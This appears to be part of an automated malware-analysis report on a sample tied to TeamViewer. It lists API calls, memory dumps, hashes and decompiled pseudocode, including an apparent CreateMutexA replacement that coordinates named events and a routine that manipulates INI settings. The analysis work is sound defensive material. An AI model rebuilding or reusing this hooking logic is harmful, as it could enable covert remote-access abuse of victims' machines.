                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E2298
                                                                                                                          • Part of subcall function 004A1A2A: __EH_prolog3.LIBCMT ref: 004A1A31
                                                                                                                          • Part of subcall function 004A1A2A: InitializeCriticalSection.KERNEL32(?,00000028,004A24F0,?,00000000,00000000,00000000,?,?,00000002,?,00000000,0000042C), ref: 004A1A46
                                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(00000001,00000004,004A3359,00000008,004BDB63,00747890,00000000,?,?,?,?,?,?,00000001,00747890,00000004), ref: 004A1CA8
                                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(00000001,?,?,?,?,?,?,00000001,00747890,00000004,?,?,?,?,00000000,00000001), ref: 004A1CC9
                                                                                                                          • Part of subcall function 005075E8: __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                          • Part of subcall function 004F2913: __EH_prolog3.LIBCMT ref: 004F291A
                                                                                                                          • Part of subcall function 004BB266: __EH_prolog3.LIBCMT ref: 004BB26D
                                                                                                                          • Part of subcall function 004A2DE3: __EH_prolog3.LIBCMT ref: 004A2DEA
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                          • Part of subcall function 004DE289: __EH_prolog3.LIBCMT ref: 004DE290
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                                          • Part of subcall function 004E1A9C: __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                                          • Part of subcall function 004DEEE8: __EH_prolog3.LIBCMT ref: 004DEEF3
                                                                                                                          • Part of subcall function 004DEFF8: __EH_prolog3.LIBCMT ref: 004DF003
                                                                                                                          • Part of subcall function 0050E7A1: __EH_prolog3.LIBCMT ref: 0050E7A8
                                                                                                                          • Part of subcall function 004A2880: __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                                          • Part of subcall function 004A2880: EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                                          • Part of subcall function 004A2880: LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                                          • Part of subcall function 004A2E2B: __EH_prolog3.LIBCMT ref: 004A2E32
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                          • Part of subcall function 004C1900: __EH_prolog3.LIBCMT ref: 004C1907
                                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                                          • Part of subcall function 004BED5B: __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                                          • Part of subcall function 0050DBBD: __EH_prolog3.LIBCMT ref: 0050DBC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$EnterLeave$LoadString$DeleteH_prolog3_H_prolog3_catchSleep_swprintfchar_traits
                                                                                                                        • String ID: - $ MH=$00-00000-000000-000000$BLOCKED$Client$Commercial$GWLevel$HTTPIN$HTTPOUT$HideOnlineStatus$IsDemoMachine$Keepalive$Language$LastKeepaliveError$LastKeepalivePerformance$LicenseType$Login$MC.L $MC.Login.WrongKey SH=$NoOfActiveKeepalive$Router$Runtime$SupportedFeatures$TCPIN$TCPOUT$TVQS$TVQSC$TeamViewer$UNKNOWN$UsageEnvironment$VPN$VPNMAC$ping3.dyngate.com
                                                                                                                        • API String ID: 2340748101-1895621411
                                                                                                                        • Opcode ID: 284cd20c6048c2be34acce99783f3d5491e2692f1c78a67421794eb950f014a4
                                                                                                                        • Instruction ID: 507374b0a125fca44c731598b8375f7de032354b548efb72292124f8c3c2b4fa
                                                                                                                        • Opcode Fuzzy Hash: 284cd20c6048c2be34acce99783f3d5491e2692f1c78a67421794eb950f014a4
                                                                                                                        • Instruction Fuzzy Hash: D1F21271804288EEDF11EBB5CD56AED7B78AF22308F14819EF40667292DB785F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F3378B0() {
                                                                                                                        				void* _t24;
                                                                                                                        				char* _t25;
                                                                                                                        				CHAR* _t27;
                                                                                                                        				void* _t31;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				CHAR* _t42;
                                                                                                                        				void* _t46;
                                                                                                                        				char _t47;
                                                                                                                        				char _t53;
                                                                                                                        				void* _t54;
                                                                                                                        				void* _t57;
                                                                                                                        				int _t58;
                                                                                                                        				int _t59;
                                                                                                                        				CHAR* _t62;
                                                                                                                        				intOrPtr _t64;
                                                                                                                        				char* _t70;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				intOrPtr _t78;
                                                                                                                        				intOrPtr _t83;
                                                                                                                        				CHAR* _t84;
                                                                                                                        				void* _t89;
                                                                                                                        				void* _t91;
                                                                                                                        				void* _t94;
                                                                                                                        				void* _t95;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				intOrPtr _t114;
                                                                                                                        
                                                                                                                        				_t62 =  *(_t95 + 0x320);
                                                                                                                        				if(_t62 == 0) {
                                                                                                                        					L20:
                                                                                                                        					_t24 = CreateMutexA( *(_t95 + 0x31c),  *(_t95 + 0x320), _t62); // executed
                                                                                                                        					return _t24;
                                                                                                                        				} else {
                                                                                                                        					_t25 = M6F340570; // 0x783f38
                                                                                                                        					if(StrCmpNIA(_t62, _t25, 0xa) == 0) {
                                                                                                                        						L4:
                                                                                                                        						_t27 = M6F34057C; // 0x784250
                                                                                                                        						if(lstrcmpiA(_t62, _t27) == 0) {
                                                                                                                        							if(M6F340514 > 0) {
                                                                                                                        								do {
                                                                                                                        									Sleep(0x3e8);
                                                                                                                        									_t58 = M6F340514; // 0x0
                                                                                                                        									_t59 = _t58 - 1;
                                                                                                                        									M6F340514 = _t59;
                                                                                                                        								} while (_t59 > 0);
                                                                                                                        							}
                                                                                                                        							if(M6F3404B8 != 0) {
                                                                                                                        								_t70 = M6F340530; // 0xa32c28
                                                                                                                        								wsprintfA(_t95 + 0x11c, "\"%s\"", _t70);
                                                                                                                        								_t53 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        								_push(_t53);
                                                                                                                        								_push(_t95 + 0x128);
                                                                                                                        								_t54 = E6F3329D0();
                                                                                                                        								_t95 = _t95 + 0x14;
                                                                                                                        								if(_t54 != 0) {
                                                                                                                        									_t91 = 0;
                                                                                                                        									while(1) {
                                                                                                                        										_t83 = M6F340544; // 0x1
                                                                                                                        										wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x45, _t83);
                                                                                                                        										_t95 = _t95 + 0x14;
                                                                                                                        										_t57 = OpenEventA(2, 0, _t95 + 0x10);
                                                                                                                        										if(_t57 != 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										Sleep(0x3e8);
                                                                                                                        										_t91 = _t91 + 1;
                                                                                                                        										if(_t91 < 0xa) {
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        										goto L12;
                                                                                                                        									}
                                                                                                                        									_push(_t57);
                                                                                                                        									L19:
                                                                                                                        									CloseHandle();
                                                                                                                        									ExitProcess(0);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L12:
                                                                                                                        							_t94 = 0;
                                                                                                                        							while(1) {
                                                                                                                        								_t114 = M6F340544; // 0x1
                                                                                                                        								wsprintfA(_t95 + 0x10, "%s%c%d", _t62, 0x45, 0 | _t114 == 0x00000000);
                                                                                                                        								_t95 = _t95 + 0x14;
                                                                                                                        								_t89 = OpenEventA(2, 0, _t95 + 0x10);
                                                                                                                        								if(_t89 == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_push(_t89);
                                                                                                                        								if(M6F340544 == 0) {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        								SetEvent();
                                                                                                                        								CloseHandle(_t89);
                                                                                                                        								Sleep(0x3e8);
                                                                                                                        								_t94 = _t94 + 1;
                                                                                                                        								if(_t94 < 0x3c) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_push(0xc);
                                                                                                                        							_push(0x6f34046c);
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_t78 = M6F340544; // 0x1
                                                                                                                        							wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x45, _t78);
                                                                                                                        							_t97 = _t95 + 0x14;
                                                                                                                        							 *0x6f34046c = CreateEventA( *(_t95 + 0x338), 1, 0, _t97 + 0x10);
                                                                                                                        							_t38 = M6F34057C; // 0x784250
                                                                                                                        							wsprintfA(_t97 + 0x1c, "%s%s%c", "Global\\", _t38, 0x4b);
                                                                                                                        							_t98 = _t97 + 0x14;
                                                                                                                        							 *0x6f340470 = CreateEventA(0, 1, 0, _t98 + 0x10);
                                                                                                                        							E6F332170(_t40, 6);
                                                                                                                        							_t42 = M6F34057C; // 0x784250
                                                                                                                        							wsprintfA(_t98 + 0x24, "%s%s%c", "Global\\", _t42, 0x52);
                                                                                                                        							_t99 = _t98 + 0x1c;
                                                                                                                        							 *0x6f340474 = CreateEventA(0, 1, 0, _t99 + 0x10);
                                                                                                                        							E6F332170(_t44, 6);
                                                                                                                        							_t46 = CreateThread(0, 0, E6F335240, 0, 0, 0); // executed
                                                                                                                        							M6F340510 = _t46;
                                                                                                                        							_t47 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        							E6F332DF0(_t47, ".bak");
                                                                                                                        							_t95 = _t99 + 0x10;
                                                                                                                        						}
                                                                                                                        						_t64 = M6F340544; // 0x1
                                                                                                                        						wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x48, _t64);
                                                                                                                        						_t31 = CreateMutexA( *(_t95 + 0x338),  *(_t95 + 0x33c), _t95 + 0x24); // executed
                                                                                                                        						return _t31;
                                                                                                                        					} else {
                                                                                                                        						_t73 = M6F340574; // 0x784294
                                                                                                                        						if(lstrcmpiA(_t62, _t73) == 0) {
                                                                                                                        							goto L4;
                                                                                                                        						} else {
                                                                                                                        							_t84 = M6F340578; // 0x798f80
                                                                                                                        							if(lstrcmpiA(_t62, _t84) != 0) {
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								goto L4;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
































                                                                                                                        APIs
                                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 6F3378D0
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 6F3378E8
                                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 6F3378F6
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 6F337909
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337927
                                                                                                                        • wsprintfA.USER32 ref: 6F337959
                                                                                                                        • wsprintfA.USER32 ref: 6F33798B
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F337999
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F3379AC
                                                                                                                        • wsprintfA.USER32 ref: 6F3379D9
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3379E7
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F337A01
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337A08
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337A13
                                                                                                                        • RtlZeroMemory.NTDLL(6F34046C,0000000C), ref: 6F337A26
                                                                                                                        • wsprintfA.USER32 ref: 6F337A3F
                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6F337A5B
                                                                                                                        • wsprintfA.USER32 ref: 6F337A79
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337A89
                                                                                                                        • wsprintfA.USER32 ref: 6F337AAF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337ABF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337AE0
                                                                                                                        • wsprintfA.USER32 ref: 6F337B12
                                                                                                                        • CreateMutexA.KERNEL32(?,?,?), ref: 6F337B2C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337B40
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337B48
                                                                                                                        • CreateMutexA.KERNEL32(?,?,?), ref: 6F337B5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CreateEvent$Sleeplstrcmpi$CloseHandleMutexOpen$ExitMemoryProcessThreadZero
                                                                                                                        • String ID: "%s"$%s%c%d$%s%s%c$.bak$8?x$Global\$PBx
                                                                                                                        • API String ID: 3072521908-1469005943
                                                                                                                        • Opcode ID: 77a9d7cee298c61c5677a070d885f03169e294ee224fca01211cbc811dab90a3
                                                                                                                        • Instruction ID: a6b6b7b4af4bb5f110e3aea0af5fc70feeb22d42f8c1c554d19a052ca8d20c7c
                                                                                                                        • Opcode Fuzzy Hash: 77a9d7cee298c61c5677a070d885f03169e294ee224fca01211cbc811dab90a3
                                                                                                                        • Instruction Fuzzy Hash: 0471F3B3E08B99AFE720EB64CC85FAB37ADEB99710F00050DF61596180DB71E5188B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F336A90(CHAR* _a4, intOrPtr _a8) {
                                                                                                                        				void _v264;
                                                                                                                        				char _v266;
                                                                                                                        				char _v267;
                                                                                                                        				char _v268;
                                                                                                                        				char _v271;
                                                                                                                        				char _v272;
                                                                                                                        				char _v273;
                                                                                                                        				char _v274;
                                                                                                                        				short _v275;
                                                                                                                        				char _v276;
                                                                                                                        				void* _t53;
                                                                                                                        				CHAR* _t55;
                                                                                                                        				CHAR* _t56;
                                                                                                                        				int _t57;
                                                                                                                        				CHAR* _t59;
                                                                                                                        				CHAR* _t60;
                                                                                                                        				CHAR* _t62;
                                                                                                                        				int _t66;
                                                                                                                        				CHAR* _t70;
                                                                                                                        				CHAR* _t72;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				int _t74;
                                                                                                                        				CHAR* _t75;
                                                                                                                        				CHAR* _t76;
                                                                                                                        				CHAR* _t78;
                                                                                                                        				CHAR* _t80;
                                                                                                                        				char _t81;
                                                                                                                        				void* _t83;
                                                                                                                        				void* _t85;
                                                                                                                        				CHAR* _t86;
                                                                                                                        				void* _t88;
                                                                                                                        				char _t97;
                                                                                                                        				CHAR* _t103;
                                                                                                                        				CHAR* _t104;
                                                                                                                        				CHAR* _t105;
                                                                                                                        				int _t108;
                                                                                                                        				CHAR* _t110;
                                                                                                                        				CHAR* _t113;
                                                                                                                        				CHAR* _t121;
                                                                                                                        				CHAR* _t122;
                                                                                                                        				CHAR* _t123;
                                                                                                                        				CHAR* _t124;
                                                                                                                        				CHAR* _t132;
                                                                                                                        				int _t133;
                                                                                                                        				int _t135;
                                                                                                                        				CHAR* _t139;
                                                                                                                        
                                                                                                                        				_t139 = _a4;
                                                                                                                        				if(_t139 != 0) {
                                                                                                                        					_t88 = _t139[4];
                                                                                                                        					if(_t88 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t88);
                                                                                                                        					}
                                                                                                                        					_t53 = _t139[8];
                                                                                                                        					if(_t53 != 0) {
                                                                                                                        						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_a8 != 0) {
                                                                                                                        					return _t53;
                                                                                                                        				} else {
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t86 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t132 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_v268 = 0x67;
                                                                                                                        						_v267 = 0x64;
                                                                                                                        						_v266 = 0;
                                                                                                                        						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
                                                                                                                        					}
                                                                                                                        					_v275 = 0x64;
                                                                                                                        					asm("sbb bl, bl");
                                                                                                                        					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
                                                                                                                        					_v273 = 0;
                                                                                                                        					_v276 = 0x68;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					E6F331D30(0x6f340034);
                                                                                                                        					_t55 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t56 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_t57 = GetPrivateProfileStringA(_t56,  &_v276, 0x6f340034,  &_v264, 0x104, _t55); // executed
                                                                                                                        					_t133 = _t57;
                                                                                                                        					E6F331D30(0x6f340034);
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t59 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t60 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_v274 = 0x63;
                                                                                                                        						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
                                                                                                                        						_t103 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t62 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_v274 = 0x6e;
                                                                                                                        						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
                                                                                                                        					} else {
                                                                                                                        						_t15 = _t133 + 1; // 0x1
                                                                                                                        						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
                                                                                                                        						_t139[4] = _t85;
                                                                                                                        						RtlMoveMemory(_t85,  &_v264, _t133);
                                                                                                                        						 *_t139 = _t133;
                                                                                                                        					}
                                                                                                                        					_v275 = 0x70;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					E6F331D30(0x6f340010);
                                                                                                                        					_t104 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t105 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_t66 = GetPrivateProfileStringA(_t105,  &_v276, 0x6f340010,  &_v264, 0x104, _t104); // executed
                                                                                                                        					_t135 = _t66;
                                                                                                                        					E6F331D30(0x6f340010);
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t121 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t122 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_v274 = 0x63;
                                                                                                                        						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
                                                                                                                        						_t70 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t123 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_v274 = 0x6e;
                                                                                                                        						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
                                                                                                                        					} else {
                                                                                                                        						_t27 = _t135 + 1; // 0x1
                                                                                                                        						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
                                                                                                                        						_t139[8] = _t83;
                                                                                                                        						RtlMoveMemory(_t83,  &_v264, _t135);
                                                                                                                        					}
                                                                                                                        					_t72 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t108 =  *0x6f34000c; // 0x1
                                                                                                                        					_t73 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_t124 =  &_v276;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					_v275 = 0x73;
                                                                                                                        					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72); // executed
                                                                                                                        					if(_t139 != 0) {
                                                                                                                        						_v275 = 0x74;
                                                                                                                        						_t139[0xc] = 0 | _t74 != 0x00000000;
                                                                                                                        						_t113 = M6F3404CC; // 0xa32d38
                                                                                                                        						_t80 = M6F3404DC; // 0xa55ca8
                                                                                                                        						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113); // executed
                                                                                                                        						_t139[0x10] = _t81;
                                                                                                                        						return _t81;
                                                                                                                        					}
                                                                                                                        					_t75 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t76 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
                                                                                                                        					_v271 = 0;
                                                                                                                        					_v274 = 0x63;
                                                                                                                        					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
                                                                                                                        					_t110 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t78 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_v274 = 0x6e;
                                                                                                                        					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
                                                                                                                        				}
                                                                                                                        			}

















































                                                                                                                        0x6f336ce5
                                                                                                                        0x6f336cf2
                                                                                                                        0x6f336cfb
                                                                                                                        0x6f336d07
                                                                                                                        0x6f336d12
                                                                                                                        0x6f336d17
                                                                                                                        0x6f336d1c
                                                                                                                        0x6f336d1e
                                                                                                                        0x6f336d24
                                                                                                                        0x6f336d32
                                                                                                                        0x6f336d42
                                                                                                                        0x6f336d42

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6F336AB3
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ABA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6F336AC6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ACD
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336B05
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00A55CA8,?,6F340034,?,00000104,00A32D38), ref: 6F336B5D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336B78
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336B7F
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336B8F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336BB9
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336BD4
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00A55CA8,?,6F340010,?,00000104,00A32D38), ref: 6F336C0E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336C31
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336C41
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336C71
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336C8C
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CB5
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CE0
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336D1C
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336D37
                                                                                                                        Strings
